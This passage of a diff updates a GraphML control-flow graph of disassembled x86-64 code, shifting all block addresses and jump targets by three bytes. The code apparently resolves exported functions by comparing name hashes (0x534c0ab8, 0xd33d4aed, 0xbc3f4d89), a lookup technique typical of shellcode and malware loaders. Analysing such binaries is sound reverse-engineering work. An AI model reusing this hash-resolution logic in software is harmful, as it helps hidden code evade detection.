-        <edge source="block.0x1165:instruction.0x1165" target="block.0x1165:instruction.0x1169"/>
+        <edge source="block.0x1168:instruction.0x1168" target="block.0x1168:instruction.0x116c"/>
       </graph>
     </node>
-    <node id="block.0x116b">
-      <data key="address">0x116b</data>
+    <node id="block.0x116e">
+      <data key="address">0x116e</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x116b</data>
+        <data key="address">0x116e</data>
         <data key="type">instructions</data>
-        <node id="block.0x116b:instruction.0x116b">
-          <data key="address">0x116b</data>
+        <node id="block.0x116e:instruction.0x116e">
+          <data key="address">0x116e</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4c8975f0</data>
           <data key="instruction.source">mov qword ptr [rbp - 0x10], r14</data>
         </node>
       </graph>
     </node>
-    <node id="block.0x116f">
-      <data key="address">0x116f</data>
+    <node id="block.0x1172">
+      <data key="address">0x1172</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x116f</data>
+        <data key="address">0x1172</data>
         <data key="type">instructions</data>
-        <node id="block.0x116f:instruction.0x116f">
-          <data key="address">0x116f</data>
+        <node id="block.0x1172:instruction.0x1172">
+          <data key="address">0x1172</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488b8578ffffff</data>
           <data key="instruction.source">mov rax, qword ptr [rbp - 0x88]</data>
         </node>
-        <node id="block.0x116f:instruction.0x1176">
-          <data key="address">0x1176</data>
+        <node id="block.0x1172:instruction.0x1179">
+          <data key="address">0x1179</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">48ffc8</data>
           <data key="instruction.source">dec rax</data>
         </node>
-        <node id="block.0x116f:instruction.0x1179">
-          <data key="address">0x1179</data>
+        <node id="block.0x1172:instruction.0x117c">
+          <data key="address">0x117c</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">48898578ffffff</data>
           <data key="instruction.source">mov qword ptr [rbp - 0x88], rax</data>
         </node>
-        <node id="block.0x116f:instruction.0x1180">
-          <data key="address">0x1180</data>
+        <node id="block.0x1172:instruction.0x1183">
+          <data key="address">0x1183</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4885c0</data>
           <data key="instruction.source">test rax, rax</data>
         </node>
-        <node id="block.0x116f:instruction.0x1183">
-          <data key="address">0x1183</data>
+        <node id="block.0x1172:instruction.0x1186">
+          <data key="address">0x1186</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">0f84d7000000</data>
-          <data key="instruction.source">je 0x1260</data>
+          <data key="instruction.source">je 0x1263</data>
         </node>
-        <edge source="block.0x116f:instruction.0x116f" target="block.0x116f:instruction.0x1176"/>
-        <edge source="block.0x116f:instruction.0x116f" target="block.0x116f:instruction.0x1179"/>
-        <edge source="block.0x116f:instruction.0x1176" target="block.0x116f:instruction.0x1179"/>
-        <edge source="block.0x116f:instruction.0x1176" target="block.0x116f:instruction.0x1180"/>
-        <edge source="block.0x116f:instruction.0x1176" target="block.0x116f:instruction.0x1183"/>
-        <edge source="block.0x116f:instruction.0x1179" target="block.0x116f:instruction.0x1183"/>
-        <edge source="block.0x116f:instruction.0x1180" target="block.0x116f:instruction.0x1183"/>
+        <edge source="block.0x1172:instruction.0x1172" target="block.0x1172:instruction.0x1179"/>
+        <edge source="block.0x1172:instruction.0x1172" target="block.0x1172:instruction.0x117c"/>
+        <edge source="block.0x1172:instruction.0x1179" target="block.0x1172:instruction.0x117c"/>
+        <edge source="block.0x1172:instruction.0x1179" target="block.0x1172:instruction.0x1183"/>
+        <edge source="block.0x1172:instruction.0x1179" target="block.0x1172:instruction.0x1186"/>
+        <edge source="block.0x1172:instruction.0x117c" target="block.0x1172:instruction.0x1186"/>
+        <edge source="block.0x1172:instruction.0x1183" target="block.0x1172:instruction.0x1186"/>
       </graph>
     </node>
-    <node id="block.0x1189">
-      <data key="address">0x1189</data>
+    <node id="block.0x118c">
+      <data key="address">0x118c</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1189</data>
+        <data key="address">0x118c</data>
         <data key="type">instructions</data>
-        <node id="block.0x1189:instruction.0x1189">
-          <data key="address">0x1189</data>
+        <node id="block.0x118c:instruction.0x118c">
+          <data key="address">0x118c</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488345b804</data>
           <data key="instruction.source">add qword ptr [rbp - 0x48], 4</data>
         </node>
-        <node id="block.0x1189:instruction.0x118e">
-          <data key="address">0x118e</data>
+        <node id="block.0x118c:instruction.0x1191">
+          <data key="address">0x1191</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488345b002</data>
           <data key="instruction.source">add qword ptr [rbp - 0x50], 2</data>
         </node>
-        <node id="block.0x1189:instruction.0x1193">
-          <data key="address">0x1193</data>
+        <node id="block.0x118c:instruction.0x1196">
+          <data key="address">0x1196</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">e967ffffff</data>
-          <data key="instruction.source">jmp 0x10ff</data>
+          <data key="instruction.source">jmp 0x1102</data>
         </node>
-        <edge source="block.0x1189:instruction.0x1189" target="block.0x1189:instruction.0x118e"/>
-        <edge source="block.0x1189:instruction.0x118e" target="block.0x1189:instruction.0x1193"/>
+        <edge source="block.0x118c:instruction.0x118c" target="block.0x118c:instruction.0x1191"/>
+        <edge source="block.0x118c:instruction.0x1191" target="block.0x118c:instruction.0x1196"/>
       </graph>
     </node>
-    <node id="block.0x1198">
-      <data key="address">0x1198</data>
+    <node id="block.0x119b">
+      <data key="address">0x119b</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1198</data>
+        <data key="address">0x119b</data>
         <data key="type">instructions</data>
-        <node id="block.0x1198:instruction.0x1198">
-          <data key="address">0x1198</data>
+        <node id="block.0x119b:instruction.0x119b">
+          <data key="address">0x119b</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488b45a0</data>
           <data key="instruction.source">mov rax, qword ptr [rbp - 0x60]</data>
         </node>
-        <node id="block.0x1198:instruction.0x119c">
-          <data key="address">0x119c</data>
+        <node id="block.0x119b:instruction.0x119f">
+          <data key="address">0x119f</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4c8b6820</data>
           <data key="instruction.source">mov r13, qword ptr [rax + 0x20]</data>
         </node>
-        <node id="block.0x1198:instruction.0x11a0">
-          <data key="address">0x11a0</data>
+        <node id="block.0x119b:instruction.0x11a3">
+          <data key="address">0x11a3</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4c896dd0</data>
           <data key="instruction.source">mov qword ptr [rbp - 0x30], r13</data>
         </node>
-        <node id="block.0x1198:instruction.0x11a4">
-          <data key="address">0x11a4</data>
+        <node id="block.0x119b:instruction.0x11a7">
+          <data key="address">0x11a7</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">e8e5030000</data>
-          <data key="instruction.source">call 0x158e</data>
+          <data key="instruction.source">call 0x1591</data>
         </node>
-        <edge source="block.0x1198:instruction.0x1198" target="block.0x1198:instruction.0x119c"/>
-        <edge source="block.0x1198:instruction.0x1198" target="block.0x1198:instruction.0x11a4"/>
-        <edge source="block.0x1198:instruction.0x119c" target="block.0x1198:instruction.0x11a0"/>
-        <edge source="block.0x1198:instruction.0x11a0" target="block.0x1198:instruction.0x11a4"/>
+        <edge source="block.0x119b:instruction.0x119b" target="block.0x119b:instruction.0x119f"/>
+        <edge source="block.0x119b:instruction.0x119b" target="block.0x119b:instruction.0x11a7"/>
+        <edge source="block.0x119b:instruction.0x119f" target="block.0x119b:instruction.0x11a3"/>
+        <edge source="block.0x119b:instruction.0x11a3" target="block.0x119b:instruction.0x11a7"/>
       </graph>
     </node>
-    <node id="block.0x11a9">
-      <data key="address">0x11a9</data>
+    <node id="block.0x11ac">
+      <data key="address">0x11ac</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x11a9</data>
+        <data key="address">0x11ac</data>
         <data key="type">instructions</data>
-        <node id="block.0x11a9:instruction.0x11a9">
-          <data key="address">0x11a9</data>
+        <node id="block.0x11ac:instruction.0x11ac">
+          <data key="address">0x11ac</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">48c78578ffffff03000000</data>
           <data key="instruction.source">mov qword ptr [rbp - 0x88], 3</data>
         </node>
       </graph>
     </node>
-    <node id="block.0x11b4">
-      <data key="address">0x11b4</data>
+    <node id="block.0x11b7">
+      <data key="address">0x11b7</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x11b4</data>
+        <data key="address">0x11b7</data>
         <data key="type">instructions</data>
-        <node id="block.0x11b4:instruction.0x11b4">
-          <data key="address">0x11b4</data>
+        <node id="block.0x11b7:instruction.0x11b7">
+          <data key="address">0x11b7</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488b4590</data>
           <data key="instruction.source">mov rax, qword ptr [rbp - 0x70]</data>
         </node>
-        <node id="block.0x11b4:instruction.0x11b8">
-          <data key="address">0x11b8</data>
+        <node id="block.0x11b7:instruction.0x11bb">
+          <data key="address">0x11bb</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4885c0</data>
           <data key="instruction.source">test rax, rax</data>
         </node>
-        <node id="block.0x11b4:instruction.0x11bb">
-          <data key="address">0x11bb</data>
+        <node id="block.0x11b7:instruction.0x11be">
+          <data key="address">0x11be</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">0f849f000000</data>
-          <data key="instruction.source">je 0x1260</data>
+          <data key="instruction.source">je 0x1263</data>
         </node>
-        <edge source="block.0x11b4:instruction.0x11b4" target="block.0x11b4:instruction.0x11b8"/>
-        <edge source="block.0x11b4:instruction.0x11b8" target="block.0x11b4:instruction.0x11bb"/>
+        <edge source="block.0x11b7:instruction.0x11b7" target="block.0x11b7:instruction.0x11bb"/>
+        <edge source="block.0x11b7:instruction.0x11bb" target="block.0x11b7:instruction.0x11be"/>
       </graph>
     </node>
-    <node id="block.0x11c1">
-      <data key="address">0x11c1</data>
+    <node id="block.0x11c4">
+      <data key="address">0x11c4</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x11c1</data>
+        <data key="address">0x11c4</data>
         <data key="type">instructions</data>
-        <node id="block.0x11c1:instruction.0x11c1">
-          <data key="address">0x11c1</data>
+        <node id="block.0x11c4:instruction.0x11c4">
+          <data key="address">0x11c4</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">48ffc8</data>
           <data key="instruction.source">dec rax</data>
         </node>
-        <node id="block.0x11c1:instruction.0x11c4">
-          <data key="address">0x11c4</data>
+        <node id="block.0x11c4:instruction.0x11c7">
+          <data key="address">0x11c7</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">48894590</data>
           <data key="instruction.source">mov qword ptr [rbp - 0x70], rax</data>
         </node>
-        <node id="block.0x11c1:instruction.0x11c8">
-          <data key="address">0x11c8</data>
+        <node id="block.0x11c4:instruction.0x11cb">
+          <data key="address">0x11cb</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488b4db8</data>
           <data key="instruction.source">mov rcx, qword ptr [rbp - 0x48]</data>
         </node>
-        <node id="block.0x11c1:instruction.0x11cc">
-          <data key="address">0x11cc</data>
+        <node id="block.0x11c4:instruction.0x11cf">
+          <data key="address">0x11cf</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8b09</data>
           <data key="instruction.source">mov ecx, dword ptr [rcx]</data>
         </node>
-        <node id="block.0x11c1:instruction.0x11ce">
-          <data key="address">0x11ce</data>
+        <node id="block.0x11c4:instruction.0x11d1">
+          <data key="address">0x11d1</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">48034dd0</data>
           <data key="instruction.source">add rcx, qword ptr [rbp - 0x30]</data>
         </node>
-        <node id="block.0x11c1:instruction.0x11d2">
-          <data key="address">0x11d2</data>
+        <node id="block.0x11c4:instruction.0x11d5">
+          <data key="address">0x11d5</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">e8ef030000</data>
-          <data key="instruction.source">call 0x15c6</data>
+          <data key="instruction.source">call 0x15c9</data>
         </node>
-        <edge source="block.0x11c1:instruction.0x11c1" target="block.0x11c1:instruction.0x11c4"/>
-        <edge source="block.0x11c1:instruction.0x11c1" target="block.0x11c1:instruction.0x11ce"/>
-        <edge source="block.0x11c1:instruction.0x11c4" target="block.0x11c1:instruction.0x11cc"/>
-        <edge source="block.0x11c1:instruction.0x11c4" target="block.0x11c1:instruction.0x11d2"/>
-        <edge source="block.0x11c1:instruction.0x11c8" target="block.0x11c1:instruction.0x11cc"/>
-        <edge source="block.0x11c1:instruction.0x11c8" target="block.0x11c1:instruction.0x11d2"/>
-        <edge source="block.0x11c1:instruction.0x11cc" target="block.0x11c1:instruction.0x11ce"/>
-        <edge source="block.0x11c1:instruction.0x11cc" target="block.0x11c1:instruction.0x11d2"/>
-        <edge source="block.0x11c1:instruction.0x11ce" target="block.0x11c1:instruction.0x11d2"/>
+        <edge source="block.0x11c4:instruction.0x11c4" target="block.0x11c4:instruction.0x11c7"/>
+        <edge source="block.0x11c4:instruction.0x11c4" target="block.0x11c4:instruction.0x11d1"/>
+        <edge source="block.0x11c4:instruction.0x11c7" target="block.0x11c4:instruction.0x11cf"/>
+        <edge source="block.0x11c4:instruction.0x11c7" target="block.0x11c4:instruction.0x11d5"/>
+        <edge source="block.0x11c4:instruction.0x11cb" target="block.0x11c4:instruction.0x11cf"/>
+        <edge source="block.0x11c4:instruction.0x11cb" target="block.0x11c4:instruction.0x11d5"/>
+        <edge source="block.0x11c4:instruction.0x11cf" target="block.0x11c4:instruction.0x11d1"/>
+        <edge source="block.0x11c4:instruction.0x11cf" target="block.0x11c4:instruction.0x11d5"/>
+        <edge source="block.0x11c4:instruction.0x11d1" target="block.0x11c4:instruction.0x11d5"/>
       </graph>
     </node>
-    <node id="block.0x11d7">
-      <data key="address">0x11d7</data>
+    <node id="block.0x11da">
+      <data key="address">0x11da</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x11d7</data>
+        <data key="address">0x11da</data>
         <data key="type">instructions</data>
-        <node id="block.0x11d7:instruction.0x11d7">
-          <data key="address">0x11d7</data>
+        <node id="block.0x11da:instruction.0x11da">
+          <data key="address">0x11da</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">48898570ffffff</data>
           <data key="instruction.source">mov qword ptr [rbp - 0x90], rax</data>
         </node>
-        <node id="block.0x11d7:instruction.0x11de">
-          <data key="address">0x11de</data>
+        <node id="block.0x11da:instruction.0x11e1">
+          <data key="address">0x11e1</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">3db80a4c53</data>
           <data key="instruction.source">cmp eax, 0x534c0ab8</data>
         </node>
-        <node id="block.0x11d7:instruction.0x11e3">
-          <data key="address">0x11e3</data>
+        <node id="block.0x11da:instruction.0x11e6">
+          <data key="address">0x11e6</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">7410</data>
-          <data key="instruction.source">je 0x11f5</data>
+          <data key="instruction.source">je 0x11f8</data>
         </node>
-        <edge source="block.0x11d7:instruction.0x11d7" target="block.0x11d7:instruction.0x11e3"/>
-        <edge source="block.0x11d7:instruction.0x11de" target="block.0x11d7:instruction.0x11e3"/>
+        <edge source="block.0x11da:instruction.0x11da" target="block.0x11da:instruction.0x11e6"/>
+        <edge source="block.0x11da:instruction.0x11e1" target="block.0x11da:instruction.0x11e6"/>
       </graph>
     </node>
-    <node id="block.0x11e5">
-      <data key="address">0x11e5</data>
+    <node id="block.0x11e8">
+      <data key="address">0x11e8</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x11e5</data>
+        <data key="address">0x11e8</data>
         <data key="type">instructions</data>
-        <node id="block.0x11e5:instruction.0x11e5">
-          <data key="address">0x11e5</data>
+        <node id="block.0x11e8:instruction.0x11e8">
+          <data key="address">0x11e8</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">3ded4a3dd3</data>
           <data key="instruction.source">cmp eax, 0xd33d4aed</data>
         </node>
-        <node id="block.0x11e5:instruction.0x11ea">
-          <data key="address">0x11ea</data>
+        <node id="block.0x11e8:instruction.0x11ed">
+          <data key="address">0x11ed</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">7409</data>
-          <data key="instruction.source">je 0x11f5</data>
+          <data key="instruction.source">je 0x11f8</data>
         </node>
-        <edge source="block.0x11e5:instruction.0x11e5" target="block.0x11e5:instruction.0x11ea"/>
+        <edge source="block.0x11e8:instruction.0x11e8" target="block.0x11e8:instruction.0x11ed"/>
       </graph>
     </node>
-    <node id="block.0x11ec">
-      <data key="address">0x11ec</data>
+    <node id="block.0x11ef">
+      <data key="address">0x11ef</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x11ec</data>
+        <data key="address">0x11ef</data>
         <data key="type">instructions</data>
-        <node id="block.0x11ec:instruction.0x11ec">
-          <data key="address">0x11ec</data>
+        <node id="block.0x11ef:instruction.0x11ef">
+          <data key="address">0x11ef</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">3d894d3fbc</data>
           <data key="instruction.source">cmp eax, 0xbc3f4d89</data>
         </node>
-        <node id="block.0x11ec:instruction.0x11f1">
-          <data key="address">0x11f1</data>
+        <node id="block.0x11ef:instruction.0x11f4">
+          <data key="address">0x11f4</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">7402</data>
-          <data key="instruction.source">je 0x11f5</data>
+          <data key="instruction.source">je 0x11f8</data>
         </node>
-        <edge source="block.0x11ec:instruction.0x11ec" target="block.0x11ec:instruction.0x11f1"/>
+        <edge source="block.0x11ef:instruction.0x11ef" target="block.0x11ef:instruction.0x11f4"/>
       </graph>
     </node>
-    <node id="block.0x11f3">
-      <data key="address">0x11f3</data>
+    <node id="block.0x11f6">
+      <data key="address">0x11f6</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x11f3</data>
+        <data key="address">0x11f6</data>
         <data key="type">instructions</data>
-        <node id="block.0x11f3:instruction.0x11f3">
-          <data key="address">0x11f3</data>
+        <node id="block.0x11f6:instruction.0x11f6">
+          <data key="address">0x11f6</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">eb5c</data>
-          <data key="instruction.source">jmp 0x1251</data>
+          <data key="instruction.source">jmp 0x1254</data>
         </node>
       </graph>
     </node>
-    <node id="block.0x11f5">
-      <data key="address">0x11f5</data>
+    <node id="block.0x11f8">
+      <data key="address">0x11f8</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x11f5</data>
+        <data key="address">0x11f8</data>
         <data key="type">instructions</data>
-        <node id="block.0x11f5:instruction.0x11f5">
-          <data key="address">0x11f5</data>
+        <node id="block.0x11f8:instruction.0x11f8">
+          <data key="address">0x11f8</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4c8b75c0</data>
           <data key="instruction.source">mov r14, qword ptr [rbp - 0x40]</data>
         </node>
-        <node id="block.0x11f5:instruction.0x11f9">
-          <data key="address">0x11f9</data>
+        <node id="block.0x11f8:instruction.0x11fc">
+          <data key="address">0x11fc</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">458b761c</data>
           <data key="instruction.source">mov r14d, dword ptr [r14 + 0x1c]</data>
         </node>
-        <node id="block.0x11f5:instruction.0x11fd">
-          <data key="address">0x11fd</data>
+        <node id="block.0x11f8:instruction.0x1200">
+          <data key="address">0x1200</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4c0375d0</data>
           <data key="instruction.source">add r14, qword ptr [rbp - 0x30]</data>
         </node>
-        <node id="block.0x11f5:instruction.0x1201">
-          <data key="address">0x1201</data>
+        <node id="block.0x11f8:instruction.0x1204">
+          <data key="address">0x1204</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4c8b7db0</data>
           <data key="instruction.source">mov r15, qword ptr [rbp - 0x50]</data>
         </node>
-        <node id="block.0x11f5:instruction.0x1205">
-          <data key="address">0x1205</data>
+        <node id="block.0x11f8:instruction.0x1208">
+          <data key="address">0x1208</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">450fb73f</data>
           <data key="instruction.source">movzx r15d, word ptr [r15]</data>
         </node>
-        <node id="block.0x11f5:instruction.0x1209">
-          <data key="address">0x1209</data>
+        <node id="block.0x11f8:instruction.0x120c">
+          <data key="address">0x120c</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4f8d34be</data>
           <data key="instruction.source">lea r14, [r14 + r15*4]</data>
         </node>
-        <node id="block.0x11f5:instruction.0x120d">
-          <data key="address">0x120d</data>
+        <node id="block.0x11f8:instruction.0x1210">
+          <data key="address">0x1210</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">458b36</data>
           <data key="instruction.source">mov r14d, dword ptr [r14]</data>
         </node>
-        <node id="block.0x11f5:instruction.0x1210">
-          <data key="address">0x1210</data>
+        <node id="block.0x11f8:instruction.0x1213">
+          <data key="address">0x1213</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4c0375d0</data>
           <data key="instruction.source">add r14, qword ptr [rbp - 0x30]</data>
         </node>
-        <node id="block.0x11f5:instruction.0x1214">
-          <data key="address">0x1214</data>
+        <node id="block.0x11f8:instruction.0x1217">
+          <data key="address">0x1217</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">8b8570ffffff</data>
           <data key="instruction.source">mov eax, dword ptr [rbp - 0x90]</data>
         </node>
-        <node id="block.0x11f5:instruction.0x121a">
-          <data key="address">0x121a</data>
+        <node id="block.0x11f8:instruction.0x121d">
+          <data key="address">0x121d</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">3db80a4c53</data>
           <data key="instruction.source">cmp eax, 0x534c0ab8</data>
         </node>
-        <node id="block.0x11f5:instruction.0x121f">
-          <data key="address">0x121f</data>
+        <node id="block.0x11f8:instruction.0x1222">
+          <data key="address">0x1222</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">7506</data>
-          <data key="instruction.source">jne 0x1227</data>
+          <data key="instruction.source">jne 0x122a</data>
         </node>
-        <edge source="block.0x11f5:instruction.0x11f5" target="block.0x11f5:instruction.0x11f9"/>
-        <edge source="block.0x11f5:instruction.0x11f9" target="block.0x11f5:instruction.0x11fd"/>
-        <edge source="block.0x11f5:instruction.0x11fd" target="block.0x11f5:instruction.0x1209"/>
-        <edge source="block.0x11f5:instruction.0x11fd" target="block.0x11f5:instruction.0x1210"/>
-        <edge source="block.0x11f5:instruction.0x1201" target="block.0x11f5:instruction.0x1205"/>
-        <edge source="block.0x11f5:instruction.0x1205" target="block.0x11f5:instruction.0x1209"/>
-        <edge source="block.0x11f5:instruction.0x1209" target="block.0x11f5:instruction.0x120d"/>
-        <edge source="block.0x11f5:instruction.0x120d" target="block.0x11f5:instruction.0x1210"/>
-        <edge source="block.0x11f5:instruction.0x1210" target="block.0x11f5:instruction.0x121a"/>
-        <edge source="block.0x11f5:instruction.0x1214" target="block.0x11f5:instruction.0x121a"/>
-        <edge source="block.0x11f5:instruction.0x121a" target="block.0x11f5:instruction.0x121f"/>
+        <edge source="block.0x11f8:instruction.0x11f8" target="block.0x11f8:instruction.0x11fc"/>
+        <edge source="block.0x11f8:instruction.0x11fc" target="block.0x11f8:instruction.0x1200"/>
+        <edge source="block.0x11f8:instruction.0x1200" target="block.0x11f8:instruction.0x120c"/>
+        <edge source="block.0x11f8:instruction.0x1200" target="block.0x11f8:instruction.0x1213"/>
+        <edge source="block.0x11f8:instruction.0x1204" target="block.0x11f8:instruction.0x1208"/>
+        <edge source="block.0x11f8:instruction.0x1208" target="block.0x11f8:instruction.0x120c"/>
+        <edge source="block.0x11f8:instruction.0x120c" target="block.0x11f8:instruction.0x1210"/>
+        <edge source="block.0x11f8:instruction.0x1210" target="block.0x11f8:instruction.0x1213"/>
+        <edge source="block.0x11f8:instruction.0x1213" target="block.0x11f8:instruction.0x121d"/>
+        <edge source="block.0x11f8:instruction.0x1217" target="block.0x11f8:instruction.0x121d"/>
+        <edge source="block.0x11f8:instruction.0x121d" target="block.0x11f8:instruction.0x1222"/>
       </graph>
     </node>
-    <node id="block.0x1221">
-      <data key="address">0x1221</data>
+    <node id="block.0x1224">
+      <data key="address">0x1224</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1221</data>
+        <data key="address">0x1224</data>
         <data key="type">instructions</data>
-        <node id="block.0x1221:instruction.0x1221">
-          <data key="address">0x1221</data>
+        <node id="block.0x1224:instruction.0x1224">
+          <data key="address">0x1224</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4c8975e0</data>
           <data key="instruction.source">mov qword ptr [rbp - 0x20], r14</data>
         </node>
-        <node id="block.0x1221:instruction.0x1225">
-          <data key="address">0x1225</data>
+        <node id="block.0x1224:instruction.0x1228">
+          <data key="address">0x1228</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">eb14</data>
-          <data key="instruction.source">jmp 0x123b</data>
+          <data key="instruction.source">jmp 0x123e</data>
         </node>
-        <edge source="block.0x1221:instruction.0x1221" target="block.0x1221:instruction.0x1225"/>
+        <edge source="block.0x1224:instruction.0x1224" target="block.0x1224:instruction.0x1228"/>
       </graph>
     </node>
-    <node id="block.0x1227">
-      <data key="address">0x1227</data>
+    <node id="block.0x122a">
+      <data key="address">0x122a</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1227</data>
+        <data key="address">0x122a</data>
         <data key="type">instructions</data>
-        <node id="block.0x1227:instruction.0x1227">
-          <data key="address">0x1227</data>
+        <node id="block.0x122a:instruction.0x122a">
+          <data key="address">0x122a</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">3ded4a3dd3</data>
           <data key="instruction.source">cmp eax, 0xd33d4aed</data>
         </node>
-        <node id="block.0x1227:instruction.0x122c">
-          <data key="address">0x122c</data>
+        <node id="block.0x122a:instruction.0x122f">
+          <data key="address">0x122f</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">7506</data>
-          <data key="instruction.source">jne 0x1234</data>
+          <data key="instruction.source">jne 0x1237</data>
         </node>
-        <edge source="block.0x1227:instruction.0x1227" target="block.0x1227:instruction.0x122c"/>
+        <edge source="block.0x122a:instruction.0x122a" target="block.0x122a:instruction.0x122f"/>
       </graph>
     </node>
-    <node id="block.0x122e">
-      <data key="address">0x122e</data>
+    <node id="block.0x1231">
+      <data key="address">0x1231</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x122e</data>
+        <data key="address">0x1231</data>
         <data key="type">instructions</data>
-        <node id="block.0x122e:instruction.0x122e">
-          <data key="address">0x122e</data>
+        <node id="block.0x1231:instruction.0x1231">
+          <data key="address">0x1231</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4c8975e8</data>
           <data key="instruction.source">mov qword ptr [rbp - 0x18], r14</data>
         </node>
-        <node id="block.0x122e:instruction.0x1232">
-          <data key="address">0x1232</data>
+        <node id="block.0x1231:instruction.0x1235">
+          <data key="address">0x1235</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">eb07</data>
-          <data key="instruction.source">jmp 0x123b</data>
+          <data key="instruction.source">jmp 0x123e</data>
         </node>
-        <edge source="block.0x122e:instruction.0x122e" target="block.0x122e:instruction.0x1232"/>
+        <edge source="block.0x1231:instruction.0x1231" target="block.0x1231:instruction.0x1235"/>
       </graph>
     </node>
-    <node id="block.0x1234">
-      <data key="address">0x1234</data>
+    <node id="block.0x1237">
+      <data key="address">0x1237</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1234</data>
+        <data key="address">0x1237</data>
         <data key="type">instructions</data>
-        <node id="block.0x1234:instruction.0x1234">
-          <data key="address">0x1234</data>
+        <node id="block.0x1237:instruction.0x1237">
+          <data key="address">0x1237</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4c89b568ffffff</data>
           <data key="instruction.source">mov qword ptr [rbp - 0x98], r14</data>
         </node>
       </graph>
     </node>
-    <node id="block.0x123b">
-      <data key="address">0x123b</data>
+    <node id="block.0x123e">
+      <data key="address">0x123e</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x123b</data>
+        <data key="address">0x123e</data>
         <data key="type">instructions</data>
-        <node id="block.0x123b:instruction.0x123b">
-          <data key="address">0x123b</data>
+        <node id="block.0x123e:instruction.0x123e">
+          <data key="address">0x123e</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488b8578ffffff</data>
           <data key="instruction.source">mov rax, qword ptr [rbp - 0x88]</data>
         </node>
-        <node id="block.0x123b:instruction.0x1242">
-          <data key="address">0x1242</data>
+        <node id="block.0x123e:instruction.0x1245">
+          <data key="address">0x1245</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">48ffc8</data>
           <data key="instruction.source">dec rax</data>
         </node>
-        <node id="block.0x123b:instruction.0x1245">
-          <data key="address">0x1245</data>
+        <node id="block.0x123e:instruction.0x1248">
+          <data key="address">0x1248</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">48898578ffffff</data>
           <data key="instruction.source">mov qword ptr [rbp - 0x88], rax</data>
         </node>
-        <node id="block.0x123b:instruction.0x124c">
-          <data key="address">0x124c</data>
+        <node id="block.0x123e:instruction.0x124f">
+          <data key="address">0x124f</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4885c0</data>
           <data key="instruction.source">test rax, rax</data>
         </node>
-        <node id="block.0x123b:instruction.0x124f">
-          <data key="address">0x124f</data>
+        <node id="block.0x123e:instruction.0x1252">
+          <data key="address">0x1252</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">740f</data>
-          <data key="instruction.source">je 0x1260</data>
+          <data key="instruction.source">je 0x1263</data>
         </node>
-        <edge source="block.0x123b:instruction.0x123b" target="block.0x123b:instruction.0x1242"/>
